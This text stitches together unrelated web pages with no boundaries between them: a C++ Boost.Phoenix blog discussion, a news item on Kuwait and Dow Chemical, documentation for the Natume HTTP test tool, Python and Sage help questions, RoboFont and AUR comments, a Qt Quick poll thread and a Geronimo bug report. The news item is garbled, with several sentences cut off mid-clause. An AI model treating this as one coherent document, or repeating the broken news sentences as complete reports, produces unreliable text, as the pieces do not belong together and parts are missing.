Now for that code, there’s nothing much to say about the if_ statement; it’s just a lazy version of the classic if keyword. phx::bind is one of the included wrappers: it creates a lazy version of the function passed as the first argument, bound with the arguments passed as additional parameters. _1 and _2 are placeholders; they’re the actual parameters passed by the algorithm to the functor, and phx::construct returns a new object of the type passed as the template parameter. Knowing that, we can now understand that “phx::bind(std::isalpha<char>, _1, phx::construct<std::locale>())” returns a lazy version of std::isalpha with the current argument from std::for_each bound as the first argument to std::isalpha and an object of type std::locale bound as the second. phx::let’s only purpose is to create scoped local variables. phx::ref returns a reference to the object passed as the parameter. phx::at_c is simple: on a std::pair, phx::at_c<0> returns .first and phx::at_c<1> returns .second.
For more information, consult the boost::phoenix documentation.
With that new tool, we can now more easily than ever use C++ to imitate some FP idioms:
#include <algorithm>
#include <iostream>
#include <iterator>
#include <numeric>
#include <string>
#include <vector>

#include <boost/fusion/include/std_pair.hpp>
#include <boost/spirit/home/phoenix/bind.hpp>
#include <boost/spirit/home/phoenix/core.hpp>
#include <boost/spirit/home/phoenix/fusion.hpp>
#include <boost/spirit/home/phoenix/object.hpp>
#include <boost/spirit/home/phoenix/operator.hpp>
#include <boost/spirit/home/phoenix/scope.hpp>
#include <boost/spirit/home/phoenix/statement.hpp>

int main(int argc, char *argv[])
{
    namespace phx = boost::phoenix;
    using namespace phx::arg_names;
    using namespace phx::local_names;

    std::vector<int> input;
    input.push_back(1);
    input.push_back(2);
    input.push_back(3);
    input.push_back(4);
    input.push_back(5);

    // map (make a new sequence with all the elements multiplied by 2)
    std::transform(input.begin(), input.end(),
        std::ostream_iterator<int>(std::cout, ", "), _1 * 2);
    std::cout << std::endl;

    // filter (make a new sequence containing all the odd numbers)
    std::remove_copy_if(input.begin(), input.end(),
        std::ostream_iterator<int>(std::cout, ", "), !(_1 % 2));
    std::cout << std::endl;

    // fold/reduce (builds up and returns a value based on the sequence)
    // I use std::string here because it makes it easier to show what is
    // going on exactly.
    std::vector<std::string> words;
    words.push_back("H");
    words.push_back("e");
    words.push_back("l");
    words.push_back("l");
    words.push_back("o");

    // foldl
    std::string result = std::accumulate(words.begin(), words.end(),
        static_cast<std::string>(""), _1 + _2);
    std::cout << result << std::endl;

    // foldr
    result = std::accumulate(words.rbegin(), words.rend(),
        static_cast<std::string>(""), _1 + _2);
    std::cout << result << std::endl;
}
In a near future, we’ll probably see more FP techniques being applied to imperative languages because they can make the code cleaner and more expressive without penalties. In the case of C++, like we just saw, they can leverage existing standard library algorithms and make them more convenient.
Or, you could use a functional language:
import List
f = head.head.sortBy (\x y->compare (length y) (length x)).group.sort
A slightly different approach that includes all the necessary code for the fully working program:
import List
main = getLine >>= print . snd . last . sort . map (\c -> (length c, head c)) . group . sort
Adrian: duh!
Though Brainiac above has a point, of sorts. Even if C++ can allow some constructs to be functional-like, they remain typically imperative by nature, and not dynamically typed. For example, your examples for foldr and foldl are very verbose and necessitate the inclusion of a few boost headers (14, if I counted correctly), and the use of relatively non-intuitive constructs.
If you look at languages like Python (a hybrid functional/imperative language) that offers very simple to use (and more importantly, to understand) “list comprehensions”, your filter example reduces to:
[ x for x in input_list if (x%2)!=0 ]
which is clear, concise and a lot cuter than the C++ code based on iterators.
Would you think that in many cases it would be preferable to hide the iterator altogether? For example, having something like
int sum = std::accumulate(input_list,_1+_2);
where most of the complexity is abstracted away?
More is not always better, and you can hide more to use less ;)
I still think the idea of having functional-like idioms brought in C++ is a great one. I’ll have to look at what pheonix has to offer.
Steven: functional programming and dynamic typing are orthogonal concepts: there exist statically typed functional languages (Haskell, ML, Miranda) and there exist dynamically typed functional languages (Erlang, Clojure, Scheme.)
About the number of headers to include: Phoenix 2.0 right now, as of boost 1.36, is only a functional programming library that is part of another one (boost::spirit), but it will eventually become a full-fledged library replacing the current boost::lambda and boost::bind libraries. Before its full release as a stand-alone library, Phoenix will be further refined, and probably a single “include all” header will be available. Myself, I don’t like using at_c to access std::pair::first or std::pair::second, and I think “first” and “second” functors should be made before that release. (It’s easy to do but should be included by default.)
Thank you for your comments :)
Steve, a few notes:
1. Only two boost headers need to be included directly for foldr and foldl — core.hpp and operator.hpp. (As an aside, Phoenix is extremely modular; technically each operator has its own header, you can include each of them individually if it suits you, operator.hpp just includes all of them.)
2. ‘Non-intuitive’ is certainly subjective. Do you think the Python list comprehension is intuitive to someone who doesn’t know Python?
2. The lambda '_1 + _2' would work given inputs of any type with an operator+, so what benefit would dynamic typing give in this context? I think quite the opposite — it would defeat the purpose of using C++ to begin with (compiler errors for types without an operator+, aggressive inlining with optimal code paths per type, etc). Template parameter deduction gives all the 'dynamic typing' needed for the sake of a lambda; what do you feel is lacking?
3. Your proposed 'std::accumulate(input_list, _1 + _2)' syntax is granted through use of a different boost library, range_ex. So given that you can already have that abstraction, what is the real critique of the lambda expression? '_1 + _2' is too verbose? If too unclear, an alternative syntax is 'arg1 + arg2'. If still too unclear, you can rename the arguments anything you want (covered in the Phoenix docs).
You are right about what’s intuitive and what’s not; for lack of a better word, I meant to say that some statements are easier to read than others, for equal tasks.
for your 2nd number 2 ;) I don’t think in terms of defeating the purpose of using C, C++, or some other language. One construct can hardly justify abandoning a language for another. C++ (and more so C) is a language where you can have rather fine control over what exactly is going on in the machine, something that can’t be said of, e.g., Python (and Java, I would suppose, though I suspect that if you know the underlying JVM very well, it’s predictable enough). So probably choosing C++ for a given project from the start is a decision based on criteria other than merely “can I do a dropwhile that is all cute” (I exaggerate, but you understand).
For number 3: no, the critique was pointed at the for_each construct, for example. You are right in saying that std::accumulate is clean enough; I have nothing much to say about it. _1 and _2 are probably good choices, since it’s likely that arg1 and arg2 may clash with existing variables (though the problem might not be on Boost’s side, we agree).
Great article, thanks.
I think most will already know this, but I just wanted to point out that C++0x will have lambda functions/closures built in, with a far nicer syntax :)
We _can_ have the best of both worlds (as soon as compilers let us :)
08 January 2009 17:00 [Source: ICIS news]
TORONTO (ICIS news)--Kuwait will counter any claims Dow Chemical plans to bring against it for pulling out of the K-Dow joint venture, the country’s Al-Watan newspaper reported on Thursday, citing industry minister Ahmed Baqer.
Baqer was quoted as saying that the
The paper also quoted other unnamed government sources as saying that
A spokesman for Dow Chemical was not immediately available for comment.
Dow said this week it planned to take legal action to protect the interests of the company and its shareholders following the collapse of its K-Dow venture with
K-Dow was pivotal to Dow’s strategy to lighten its asset base and create a more market-facing chemical company with the help of a yet-to-be-completed $18.5bn takeover of
Analysts said earlier that Dow was not likely to find a new joint venture partner that would match the $7.5bn price PIC had offered for Dow’s commodity chemical assets under the K-Dow deal.
Natume 0.1.0
HTTP DSL Test Tool
Natume is an HTTP DSL test tool that helps you easily build tests for mobile applications.
How to install
First, download or fetch it from GitHub, then run this command in a shell:
cd natume  # the path to the project
python setup.py install
Development
Fork or download it, then run:
cd natume  # the path to the project
python setup.py develop
Compatibility
Built and tested under Python 2.7
How to write your dsl http test
The DSL syntax is most like the INI file format.
comment
A line beginning with “#” is a comment line.
method section
A line that begins with “[” and ends with “]” starts a test method section:
[add friend]
# comment
> POST /request fid=1233 access_token="Blabla"
code: 200
content <- OK
Initialize your test instance variables
You can initialize or bind variables using the intialize method:
[intialize]
@key = "key"
@page = 2
All keys beginning with “@” become test case instance attributes; for example, @key is compiled to “self.key”. The intialize method is called in the setUp method.
http send command
A line beginning with “>” is an HTTP request:
> GET /post key="Blabla" page=1
> POST /profile name="Blabla" email="e@e.com"
set request header
Sometimes a request requires headers to be set; you can use the “=>” command to set a header:
referer =>
Referer =>
Accept-Encoding => gzip, deflate, sdch
Accept_encoding => gzip, deflate, sdch
Note
The header key is case-insensitive, and key parts will be automatically transformed to the real HTTP key pattern.
Assert the response
Currently, Natume supports content regex match asserts, JSON data asserts, and response header asserts, using three assert tokens.
:
The “:” assert token is compiled to the assertEqual method, to check a header, response text, or response JSON data:
code: 200
content_type: application/json
charset: utf-8
<-
It is compiled to the assertIn method for response content tests:
content <- OK
json <- ['data']['title'] = "Blabla"
=~
It is compiled to a regex check on the response content. The regex value must begin and end with “/”, and can be combined with regex options:
content =~ /OK/
json =~ ['data']['title'] = /Blabla/i
Note
Currently, three regex compile options are supported: “i” (re.I), “m” (re.M), “s” (re.S).
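As an illustration of how those option letters correspond to Python's re flags, here is a hypothetical sketch (OPTION_FLAGS and compile_pattern are illustrative names, not Natume's actual internals) of compiling a /pattern/opts literal:

```python
import re

# Hypothetical illustration (not Natume's actual internals): map the DSL's
# regex option letters to Python's re compile flags.
OPTION_FLAGS = {"i": re.I, "m": re.M, "s": re.S}

def compile_pattern(literal):
    """Compile a '/pattern/opts' literal into a Python regex object."""
    body, _, opts = literal.rpartition("/")  # split off the trailing options
    pattern = body[1:]                       # strip the leading '/'
    flags = 0
    for ch in opts:
        flags |= OPTION_FLAGS[ch]
    return re.compile(pattern, flags)
```

For example, `compile_pattern("/OK/i")` yields a case-insensitive pattern, so it would match a response body containing "ok".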
Test response header info
When the code command is set:
code: 200
it will assert response status code.
When the content_type command is set:
content_type: application/json
it will assert response content_type.
When the charset command is set:
charset: utf-8
it will assert response charset.
Note
When “:” is used to test response info, if the assert key is not one of (content, json, code, content_type, charset), it will test the response header info.
content
When testing the response text, the following commands are supported:
content: OK
content <- OK
content =~ /Ok/i
json
When the response is JSON data, we can use the json key to assert:
json <- ['data']['title'] = 'title'
json: ['data']['trackList'][0]['song_id'] = '1772167572'
json: ['data']['type_id'] = 1
# data size
json ~~ ['data'] = 56
DSLWebTestCase
When you want to write the DSL test in a unittest test case, write the test methods in the test case class docstring:
from natume import DSLWebTestCase, WebClient
import unittest

class DSLWebTestCaseTest(DSLWebTestCase):
    u"""
    [index]
    > GET /
    content <- 虾米音乐网(xiami.com)

    [song api]
    > GET /song/playlist/id/1772167572/type/0/cat/json
    content_type: application/json
    charset: utf-8
    json: ['data']['trackList'][0]['title'] = u'再遇见'
    json: ['data']['trackList'][0]['song_id'] = '1772167572'
    json: ['data']['type_id'] = 1

    [search]
    > GET /search/collect key='苏打绿'
    code: 200
    content <- 苏打绿歌曲: 最好听的苏打绿音乐试听
    content =~ /Xiami.com/i

    [search page 2]
    > GET /search/collect/page/2 key=@key order='weight'
    code: 200
    content <- 苏打绿歌曲: 最好听的苏打绿音乐试听
    content =~ /XiaMi.com/i
    """

    @classmethod
    def setUpClass(self):
        self.client = WebClient('')
        self.key = '苏打绿'

    def test_t(self):
        self.t(u"""
        > GET /search/collect/page/2 key=@key order='weight'
        code: 200
        content <- 苏打绿歌曲: 最好听的苏打绿音乐试听
        """)
You can also use the t method to build a request section test.
Note
The WebClient will keep and refresh the cookies and ETag when you use the same WebClient to test your application.
Run test in terminal
Like unittest, Natume can also run in a terminal, and can test directories and files.
Here are the demos; the test files are in the project's examples directory:
$ python -m natume -u examples/xiami.smoke -d
test_index (__builtin__.XiamiTest) ... ok
test_search (__builtin__.XiamiTest) ... ok
test_search_page_2 (__builtin__.XiamiTest) ... ok
test_song_api (__builtin__.XiamiTest) ... ok

----------------------------------------------------------------------
Ran 4 tests in 0.674s

OK
$ python -m natume -u examples -d
test_index (__builtin__.XiamiTest) ... ok
test_search (__builtin__.XiamiTest) ... ok
test_search_page_2 (__builtin__.XiamiTest) ... ok
test_song_api (__builtin__.XiamiTest) ... ok

----------------------------------------------------------------------
Ran 8 tests in 2.893s

OK

- Author: Thomas Huang
- Keywords: http,test
- License: GPL 2
- Categories
- Development Status :: 5 - Production/Stable
- Environment :: Web Environment
- Intended Audience :: Developers
- Programming Language :: Python
- Programming Language :: Python :: 3
- Programming Language :: Python :: Implementation :: CPython
- Programming Language :: Python :: Implementation :: PyPy
- Topic :: Internet :: WWW/HTTP :: Dynamic Content
- Package Index Owner: lyanghwy
- DOAP record: Natume-0.1.0.xml
Hello,
I'm currently working on a project for class and I've gotten stuck. I am supposed to write a program that will read a csv file and create a text file with information from this csv file.
So far I have code that prompts for the file name and gives a "File not found" message if the file does not exist, and will prompt over and over again until a valid file name is entered. What I'm stuck on is a function that I've created to get the values of a certain column into a list. The code is below:
def get_values(file, column_index):
    '''(str, int) -> list
    Return a list of values in file at column_index'''
    value_list = []
    for line in file:
        line_list = line.split('.')
        value_list.append(line_list[column_index])
    return value_list

while True:
    try:
        file_name = input('Enter in file name: ')
        input_file = open(file_name, 'r')
        break
    except IOError:
        print('File not found.')
I'm trying to make the code as general as possible so that any csv file and column index can be used. When I run the program, though, I get an error message for the line "value_list.append(line_list[column_index])". Why is that? I thought using a variable like this was valid.
Thanks for any help.
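For anyone landing here later: the error most likely comes from splitting on '.' instead of ',' (a CSV line like "a,b,c" contains no '.', so line.split('.') returns a one-element list and column_index goes out of range). A hedged sketch of the same idea using the standard csv module (get_column and the sample data are illustrative names, not from the original post):

```python
import csv
import io

def get_column(file, column_index):
    """Return a list of values at column_index from an open CSV file.

    csv.reader splits on commas and also handles quoted fields,
    which plain str.split cannot do.
    """
    reader = csv.reader(file)
    return [row[column_index] for row in reader if len(row) > column_index]

# Example with an in-memory file standing in for the opened input_file.
sample = io.StringIO("name,age\nAlice,30\nBob,25\n")
print(get_column(sample, 1))  # → ['age', '30', '25']
```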
Additional Space Center windows in Single Window Mode
I really like Single Window Mode, but sometimes wish I could have an additional Space Center window if necessary. Is there a way to do that? Would be especially helpful for tiling to different monitors.
- marksimonson last edited by
Indeed! Option-click on the Space Center icon. (via @RoboFontCanThis on Twitter, which I discovered the other day.)
Hmm... doesn't seem to work in Single Window Mode.
- marksimonson last edited by
Oops, I missed that part. I always work in Many Window Mode.
see
from mojo.UI import OpenSpaceCenter
OpenSpaceCenter(CurrentFont(), newWindow=True)
Import custom sage libraries into a Jupyter notebook
What is the correct way to write and import custom SAGE libraries into a jupyter notebook?
When using jupyter notebooks with a python kernel, importing your own python library is as easy as saving a file foo.py in the same directory as the notebook and putting an
import foo line in the notebook. Using a SAGE kernel, I can import foo.py into my notebook, but without the ability to call SAGE methods: e.g. calling the function
def monty(n):
return SymmetricGroup(n)
from foo.py gives the error,
NameError: global name 'SymmetricGroup' is not defined
My desired workflow: work in a notebook for convenience but be able to pass on what I've done in the form of a library.
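One common workaround is to import Sage's global names inside the library itself via sage.all, so foo.py works under the Sage kernel. A sketch; note the try/except fallback is mine, added only so the module stays importable outside a Sage environment (under the Sage kernel the import should succeed):

```python
# foo.py -- a sketch; assumes a Sage installation so that sage.all is importable.
try:
    from sage.all import SymmetricGroup  # pull the Sage global into this module
except ImportError:
    # Outside a Sage environment the import fails; keep the module importable
    # anyway so non-Sage tooling can still load it.
    SymmetricGroup = None

def monty(n):
    # Returns the symmetric group on n letters when running under Sage.
    return SymmetricGroup(n)
```

With that import in place, `import foo` in the notebook followed by `foo.monty(3)` should no longer raise the NameError.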
Future adopter: please read @JoFa's suggestion and implement it if appropriate.
Package Details: anttweakbar 1.16-7
Dependencies (2)
Required by (1)
Sources (1)
Latest Comments
mis commented on 2016-02-24 17:19
thiagowfx commented on 2016-02-24 17:14
@JoFa: I don't use this package anymore, so I am going to orphan it.
JoFa commented on 2016-02-24 12:49
I tried to install the vulkan demo 'gl_vk_chopper', which needs anttweakbar to build. However, it also requires libAntTweakBar.a, so I suggest you add something like:

install -Dm755 lib/libAntTweakBar.a "${pkgdir}/usr/lib/libAntTweakBar.a"

to the PKGBUILD.
regards,
Jonas
Zuf commented on 2014-03-18 20:13
Fixed, thanks!
thiagowfx commented on 2014-03-18 00:37
Please add 'glu' as a make dependency, otherwise we get this error:
TwEventGLUT.o TwEventGLUT.c
In file included from TwEventGLUT.c:23:0:
MiniGLUT.h:38:23: fatal error: GL/glu.h: No such file or directory
# include <GL/glu.h>
Zuf commented on 2013-12-10 19:10
Source updated
thiagowfx commented on 2013-12-10 17:08
Please change the mirror again.
For example, this one works currently:
source=("")
Zuf commented on 2013-10-30 19:22
Fixed.
Anonymous comment on 2013-06-14 00:40
The download URL has rotted. Need to change "ignum.dl.sourceforge.net" to "superb-dca3.dl.sourceforge.net" in the PKGBUILD file.
ekpyron commented on 2012-08-07 22:40
Current version is 1.15.
Added the static lib, and since I don't use it, orphaned again.
[Poll] Which direction should Qt Quick 2.x development take?
p{color:#777}. ----------------------------------------------------------------------------
p{color:#258}. Qt 5.0 (which is already in feature-frozen alpha stage) introduces the new scene-graph based Qt Quick 2.0 framework. While the foundations are there, and for many use-cases (mobile apps, certain types of games, ...) it is already deemed a vastly superior way of creating UI's, it is definitely not yet ready for replacing the Qt Widget framework everywhere.
p{color:#258}. Considering that only finite development resources are available, which potential improvement/add-on for Qt Quick 2.x should - in your opinion - have the highest priority for Qt 5.1 and 5.2?
%{color:white}.%
Desktop Components
|{text-align:left}. a comprehensive set of Qt Quick UI elements with native look & feel on all supported desktop platforms.|
|{text-align:left;color:#BF5F00}. %{text-decoration:underline}Note:% There is currently a "labs project": for this.|
Generic Theming Support
|{text-align:left}. a way to easily create themeable components, similar to what QStyle make possible for QWidget subclasses|
Binary QML
|{text-align:left}. support for translating QML into a corresponding binary data structure at compile time (rather than letting the Qt Quick engine do it during application start-up), for IPR(intellectual property rights) protection and reduced application start-up time|
Expanded C++ Component API
|{text-align:left}. support for extending existing Qt Quick components, and more convenience for implementing new ones, in C++|
|{text-align:left;color:#BF5F00}. %{text-decoration:underline}Note:% Qt Quick 2.0 does already allow C++ developers to create custom components by subclassing "QQuickItem": or "QQuickPaintedItem":. However, the built-in components (like "Rectangle":, etc.) are not exposed to C++ and hence cannot be extended/re-used, and also some users feel that in general more C++ convenience API could be provided.|
Full C++ API %{color:#BF5F00}(should have been better named: "Dedicated C++ Front-end API")%
|{text-align:left}. first-class support for instantiating Qt Quick elements and populating the Qt Quick scene graph directly from C++, without using any QML - potentially allowing C++11 lambdas (or a custom signal/slot based solution) instead of JavaScript expressions for property bindings|
|{text-align:left;color:#BF5F00}. %{text-decoration:underline}Note:% Qt Quick 2.0 does already provide some C++ API for manually populating the scene graph through "QSGNode":, "QSGGeometry":, "QSGMaterial":, etc. However, some things - like instantiating built-in components - is not possible without passing around at least small snippets of QML, and no clean C++-only alternative is provided for property bindings (one of the things that make Qt Quick so powerful), and altogether some users feel that the existing C++ scene-graph API should be either expanded, or complemented by a different one (e.g. declarative, but still native C++) to make it a "first-class citizen" alternative to the QML "front-end" for Qt Quick.|
Optional V8 Dependency
|{text-align:left}. support for building & deploying Qt Quick without the V8 engine for applications which don't need any of the JavaScript-depending features|
Graphics View Component
|{text-align:left}. a Qt Quick component providing similar massive-data-visualization functionality as the QWidget-based QGraphicsView (including things like BSP tree indexing of items, collision detection, ...)|
some other improvement/add-on (specify in comment section)
nothing - I'm happy with what Qt Quick 2.0 (to be shipped with Qt 5.0) provides
nothing - I don't like Qt Quick altogether, I'd like to see more resources put into improving other parts of Qt
%{color:white}.%
p{color:#258}. Other things which have been requested before in various places, but which I missed at the time when I created the poll (if applicable to you, select "some other improvement/add-on" in the poll and specify by leaving a comment):
%{color:white}.%
Sandboxed Mode
|{text-align:left}. Ability to safely run QML files from non-trusted sources, e.g. for using Qt Quick as a Powerpoint replacement.|
|{text-align:left;color:#BF5F00}. %{text-decoration:underline}Note:% For an idea of what QML makes possible for "presentation" use-cases, see this "labs project": .|
Better Model/View Support
|{text-align:left}. More convenience for creating QML views for complex custom data models implemented in C++.|
p{color:#777}. ------------------------
":...]
- cfreeloader
I appreciate you putting together this poll. The topic items seem fairly inclusive of various things people have been talking about. Thank you!
Is this so strange?
It almost seems that most people do not understand the reason and origin of Qt anymore.
Qt is (was?) a cross desktop C++ api.
It now becomes a very limited platform for creating flash/html5 like apps and games (that's my opinion of course).
I do not mind that the QML capability gets added.
I do greatly mind that bigger parts of Qt need to suffer from this.
I do not have the money, I do not have the knowledge and I do not have the time to turn this around. I only have my voice and passion for Qt. I'm very sad and deeply disappointed that Nokia steers Qt in the current way.
However, I would at the same time like to invest time in QML with the Raspberry Pi, as I think QML can be a nice tool on that platform.
some other improvement/add-on
Easier connecting of advanced QAbstractItemModel to QML.
- Brandybuck
I wouldn't mind QtQuick so much, if it weren't for the extreme awkwardness of communicating with the backend. It's almost like Qt is deliberately discouraging the use of C++ anywhere.
I agree it would be nice to see what people are thinking in the community. I'd just like to annotate with some points on the scope of these options (very important for anyone who wants to actively prioritize something by contributing). This might also provide some insight into how realistic it is for these to happen by 5.1.
[quote author="jdavet" date="1335468153"]
- Desktop Components
[/quote]
Everyone agrees this should be done, it fits into the QML picture well, and there's a labs project already. If a common API or architecture can be achieved (even a de facto one by convention) then per platform implementations shouldn't be too hard.
[quote author="jdavet" date="1335468153"]
- Generic Theming Support
[/quote]
Already multiple labs-level projects. Everyone also seems to agree this should be done as part of QtQuick, just that no-one has had time to do it.
[quote author="jdavet" date="1335468153"]
- Binary QML
[/quote]
Already done ;) . The only thing missing is allowing the compile phase to be run separately to instantiating the scene, so that the binary data can be stored. This extra step wouldn't be in conflict with any existing QML direction, but no-one has gotten around to it.
[quote author="jdavet" date="1335468153"]
- Expanded C++ Component API
[/quote]
This one is big. Not just in terms of relative furor, but in terms of the work involved too. For UI elements we have usually found the ideal QML API to be different to the ideal C++ API, and for the QtQuick UI primitives we have been focusing the first several years on just getting a good QML API. I'm not even sure we're done with that challenge.
Creating an adjacent C++ API sharing the same implementation without causing drawbacks for one or both APIs is not theoretically impossible. But it will be tough, and there's a lot of work involved. I don't really know how that would look. Eventually, when the QML API is finished, core QML contributors will probably start to tackle this problem. But I can't see visible progress being made by 5.1, there's just too much to do.
[quote author="jdavet" date="1335468153"]
- Full C++ API %{color:#BF5F00}(should have been better named: "Dedicated C++ Front-end API")%
[/quote]
Basically a subset of the last one. Once C++ APIs have been developed to allow that sort of fine control from C++, basic instantiation and manipulation should come for free.
[quote author="jdavet" date="1335468153"]
- Optional V8 Dependency
[/quote]
Plausible, but the usecase isn't clear. You'd be throwing away much of QML by removing full JS bindings, even if we still allowed optimized bindings. While this is simpler than adding a C++ API, the C++ API sounds like the correct solution for this usecase.
[quote author="jdavet" date="1335468153"]
- Graphics View Component
[/quote]
Interesting idea. I haven't heard of this one before, so I don't know if it's something that should be done by QQuickCanvas (as a 'better' QGraphicsScene/View) or whether there should be a separate element for this more specialized usecase. A clear usecase or a labs-level prototype might be necessary to convey this idea effectively.
[quote author="jdavet" date="1335468153"]
- nothing - I'm happy with what Qt Quick 2.0 (to be shipped with Qt 5.0) provides
[/quote]
QtQuick is still very young - I'm quite suspicious of anyone who says this ;) .
[quote author="jdavet" date="1335468153"]
- Sandboxed Mode
[/quote]
This is a good idea that should be straightforward. All you need is a network access manager that denies loading external resources (and XMLHttpRequest), and a strict limit on the C++ plugins that can be imported (e.g., only allow "QtQuick 2.0" to import C++ plugins).
[quote author="jdavet" date="1335468153"]
- Better Model/View Support
[/quote]
This one's already on my list as a future research project :) . Very ill-defined scope at the moment though.
[quote author="jdavet" date="1335468153"]...[/quote]
This disclaimer explains the official way to prioritize things - contributors all get to decide for themselves. Becoming a contributor is an easy way to advance many of these forward (well, easy if you have C++ skills already). Commercial customers should be able to influence what Digia prioritizes via separate channels.
[quote author="MStormO" date="1335840907"]Better Model/View Support[/quote]
Or how to keep the voice of the little open source desktop developer quiet.
I don't understand your post at all.
The only way I can voice my opinion is through these forums/blogs and polls.
I can't attend your contributor summit. I do not have the right credentials, I do not have the time, I do not have the money to travel and the amount of people that can attend is limited.
I can't help with writing core parts of Qt. I do not have the knowledge and I do not have the time. Did you know I'm a user of Qt not a developer? I use Qt to make my daily work easier.
Tell me how I can interpret your post as anything other than "get bent"?
There are few things I can't stand in this world, one is unfairness. You are unfair!
[quote author="tbscope" date="1335856732"]I don't understand your post at all.
The only way I can voice my opinion is through these forums/blogs and polls.[/quote]
Nobody said you can't voice your opinion. The point being made is that code doesn't come out of thin air, it requires people to actually work on it. As the open source developer you profess to be, surely you understand that, so I won't go into too much detail.
So, assuming we can agree that for code to materialise, it needs developer time. There's a number of different ways to get developer time. I've covered these elsewhere, but here's a rough list:
- do it yourself
- pay someone else to do it for you (Digia, other consultancies)
- hope that you find someone else that is willing to do one of the above
I'm perfectly happy for you to be in category #3 on that list, I really don't mind. But you need to adjust your expectations as to how likely it is that someone is going to pay attention to you and do what you want when you're offering nothing but opinions.
Opinions don't pay engineers' salaries, add features, or fix bugs.
Now, that doesn't mean that your complaints may not be valid - I don't think anyone here has said anything like that - but it does mean that they most likely won't get the priority you think they deserve.
Marius was pointing out - quite rightly - that Qt is a meritocracy. A do-ocracy. A community of people who work to improve Qt together. If you're here because you're getting something for 'free', then you're lucky that open source allows for that to happen. It just doesn't mean anyone has to pay attention to you.
Finishing with a quote from Linus Torvalds, who said it best: "talk is cheap, show me the code".
Something worth addressing separately:
[quote author="tbscope" date="1335856732"]I can't help with writing core parts of Qt. I do not have the knowledge and I do not have the time.[/quote]
Writing Qt is pretty much the same as writing any other code. There's nothing about it that makes it special, or magical, apart from your preconceptions. Sure, there are somewhat strict quality standards (meaning you need to write tests to prevent bugs from reappearing etc), but many other projects have these, and they aren't so hard to understand.
What's more is that there are plenty of people around the project who will more than happily help out if you want to work on something - anything. You're welcome here.
"I don't have the time" - well, I can understand that to some degree. The work I do on Qt is done in my own free time, too - I'm not paid for it. But Qt as a whole is greater than the sum of its parts: the more everyone chips in a little, the more we get done as a whole.
Finally, you've got to admit that there's something cool about thousands of developers and millions of people worldwide using code you wrote, no matter how small.
I'm glad to see this poll appear. It seems way more balanced than the previous one. It is rather limiting though, in the sense that you can only select one item, while I think more than one item on the list is important.
I voted for the Desktop Components. This labs project, already demonstrated at last years Contributors Summit, really deserves more attention. However, I think that should be in the context of a wider effort to make components more compatible in terms of API across the range of platforms.
Model/View is also of prime importance, I think. However, I think this cannot stand separately from a re-thinking of the current C++ model view classes. This is a big task to do right, I think.
I think it should be a goal that at least the components become more easily accessible from C++, but I understand the need to stabilize them first before freezing the API by making them public. However, being able to compile-in QML in binary form and get rid of the V8 engine if you want would be very nice, if only because it would make distribution to Apple devices and systems easier. Yes, you lose features in QML if you do that, but those that can live with that really benefit in terms of cross platform compatibility and distribution file size, as well as in startup times.
Hi.
I would like to know if there is any ongoing work to use ANGLE () inside the QDeclarative module; this topic seemed the right place to ask.
It's a feature I'd really like to see.
On some Windows computers, OpenGL is not supported (mostly because the drivers are not installed or are outdated) but DirectX 9 is supported. So ANGLE would be a way to support QML 2.0 on most of the Windows desktops out there.
If not, is it possible to have a quick evaluation of how much effort this would cost?
Thanks !
@cor3ntin:
There has been some talk about it, but as far as I know, no one has yet experimented with it.
Feel free to do some experiments and report them on the development mailing list, which you will find here:
1.) Desktop components
but PLEASE focus on making it possible to have the SAME API for ALL components - at least for those components which are generic on all platforms.
Example: I don't want to write 3 QML UIs for Windows, Linux and OSX just for supporting all of them - the platform desktop components should take care of everything for me by just including something like:
import org.qt.qml.desktopcomponents;
This poll is impossible to answer, because it lists multiple things that are fundamental requirements as mutually exclusive choices :-)
[quote author="miroslav" date="1337777681"]This poll is impossible to answer, because it lists multiple things that are fundamental requirements as mutually exclusive choices :-)[/quote]
Yeah, the forum does not support multiple-answer polls. So you'll need to prioritize... :-)
The "right way" to do this would actually require setting up a special survey web page, and allow the audience to rate each feature on a scale like this:
3. Binary QML
- Adding this feature right now (for Qt 5.1)
- Adding this feature eventually (at some point in the future)

Doing it as a proper survey would also allow correlating the results with different user groups, by adding questions like...

What will you use Qt Quick for primarily, in the foreseeable future?
- freeware or open-source project(s)
- commercial software

What's your experience level with Qt Quick?
- don't know much about it yet
- read lots of documentation, but didn't get my hands dirty yet
- already experimented with it somewhat
- wrote one or more small apps with it (or ported existing ones)
- successfully wrote a large, complex application with it (or ported an existing one)
  → type of application: ______
- helped to design/develop Qt Quick itself
But for this to happen, the Qt Project (or Nokia or Digia) would have to get behind it and do it as an official survey.
I'd like to see Qt Mobility made available for Desktop targets in Qt Creator (I haven't tried 5.0 yet, but in Qt 4.8 I am not able to compile for desktop if I use Mobility). Also, if Mobility gets allowed for desktop targets, I'd like to see it renamed to something more suitable because a desktop target clashes with the "mobile" aspect of the name "Qt Mobility".
It'd be nice if QML/JS was officially supported for all mobile platforms. I heard that Necessitas (Qt for Android) will be merged with Qt in the near future. That's great to hear. I hope the same will happen with the iOS efforts, and that a common API will be created to access device hardware and common functionalities regardless of platform.
https://forum.qt.io/topic/16232/poll-which-direction-should-qt-quick-2-x-development-take
Anthony Insolia commented on GERONIMO-6474:
-------------------------------------------
I may have fixed this problem by first eliminating the second id and also by making two superclasses
serializable. I missed them. I will do more testing before I close the bug report.
> Reactivated/Reloaded Entity Bean not restoring UUID. UUID is correct upon construction and is correct in the RDB.
> -----------------------------------------------------------------------------------------------------------------
>
> Key: GERONIMO-6474
> URL:
> Project: Geronimo
> Issue Type: Bug
> Security Level: public(Regular issues)
> Components: OpenEJB
> Affects Versions: 3.0.0
> Environment: Apache Geronimo 3.0
> Apache Myfaces
> Primefaces
> MySQL
> Reporter: Anthony Insolia
>
> I have a User class with an @OneToOne relationship to a Desktop class
> User->Desktop
> @Entity
> @Table(name="user_table")
> @Unique(members={"name"})
> @ManagedBean(name = "User")
> @RequestScoped
> public class User extends Element_ implements Serializable {
> @Id
> private long uuid = 0;
> @OneToOne(targetEntity=Folder.class,cascade=CascadeType.ALL)
> @MapsId
> private Folder desktop = null;
> ...
> I was trying to save the User and their desktop and JPA informed me that the UUID at the superclass level didn't match the UUID at the subclass level.
> Here is some println's from a method in User marked @PostLoad to see what the desktop UUID's are:
> User (snoop) is looking at the desktop with THIS <uuid> 0
> User (snoop) is looking at the desktop with SUPER <uuid> 429823953
> 'snoop' is the name of the @PostLoad method in my User class
> I tried to repair the UUID as a work around but it causes an exception:
> <openjpa-2.1.1-r422266:1148538 nonfatal user error> org.apache.openjpa.util.InvalidStateException: Attempt to change a primary key field of an instance that already has a final object id. Only new, unflushed instances whose id you have not retrieved can have their primary keys changed.
